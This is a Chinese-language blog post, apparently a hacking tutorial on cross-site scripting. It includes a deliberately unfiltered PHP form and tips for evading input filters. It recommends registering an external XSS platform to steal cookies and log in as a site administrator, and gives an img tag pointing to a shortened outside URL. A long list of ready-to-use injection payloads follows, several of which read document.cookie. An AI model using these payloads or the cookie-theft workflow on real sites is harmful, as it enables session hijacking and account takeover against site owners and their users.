XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。

————百度百科

xss有三种分别是:反射型 ,储存型 ,DOM型

反射型:

下面为一个测试的表单页面:

<html> 

<head> 

<title>XSS原理重现</title> 

</head> 

<body> 

<form action=”” method=”get”> 

<input type=”text” name=”xss_input”> 

<input type=”submit”> 

</form> 

<hr> 

<?php $xss = $_GET[‘xss_input’];  

echo ‘你输入的字符为<br>’.$xss;  

?> 

</body> 

</html>

在页面中输入框输入:

<script>alert(“1”)</script>

会弹出弹框

其实反射型一般只是为了验证测试 站点是否存在xss漏洞 当然反射型也是有一点危害的 比如可以打本地cookie

<script>alert(document.cookie)</script>

xss一般在网站的留言板 评论区 搜索框 只要是有表单提交的地方 我们不妨试一下 对了 之所以存在xss漏洞是因为网站没有过滤字符

比如我们在留言板输入alert(“xss”) 时 程序员没有将<> / “” 等字符给过滤掉 所以导致xss的危害

我们在实战中 并没有这么简单 实战中 一些网站安全性都是很高的 他们都会限制一些字符 长度 函数

那么遇到过滤时 我们可以用 编码转换 空格 大小写 还有加密这个xss代码 来绕过 同时还可以利用审查元素来怼

大小写然后空格也可以看他限制什么我们就针对什么<S C R P T>

针对长度限制 还有url伪装 想要精通xss 就必须会html和javascript js

储存型:

首先先注册一个XSS平台

例如:https://xsshs.cn/

复制代码(我这是获取cookie的)(当管理员的cookie被我获取到了之后就可以通过一些cookie的登录工具登录)

这里还有一个图片xss代码 图片的可以用在留言板 评论区一些地方吧

<img src=”http://t.cn/RSmRdTS”>

一些常用的XSS

alert(location.href)//

“;alert(location.href);

“)};alert(location.href);

<script>alert(location.href)</script>

“><img src=1 onerror=alert(location.href)>

‘><img src=1 onerror=alert(location.href)>

javascript:alert(location.href)//

888″ onerror=alert(location.href) a=”

<svg onload=alert(location.href)>

‘><script>alert(document.cookie)</script>

=’><script>alert(document.cookie)</script>

<script>alert(document.cookie)</script>

<script>alert(vulnerable)</script>

</script>”>'<script>alert(document.cookie)</script>

%3Cscript%3Ealert(‘XSS’)%3C/script%3E 

<script>alert(‘XSS’)</script> 

<img src=”javascript:alert(‘XSS’)”> 

“><script>alert(‘XSS’)</script>

</script>”><script>prompt(1)</script>

参考网站:http://www.ac166.cn/

最后修改日期:2020年2月1日

作者

留言

撰写回覆或留言

发布留言必须填写的电子邮件地址不会公开。